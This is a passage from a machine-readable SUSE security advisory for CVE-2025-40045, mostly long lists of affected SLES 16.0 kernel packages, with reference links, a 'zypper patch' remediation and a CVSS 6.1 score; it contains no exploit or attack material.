"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40045",
"url": "https://www.suse.com/security/cve/CVE-2025-40045"
},
{
"category": "external",
"summary": "SUSE Bug 1252784 for CVE-2025-40045",
"url": "https://bugzilla.suse.com/1252784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
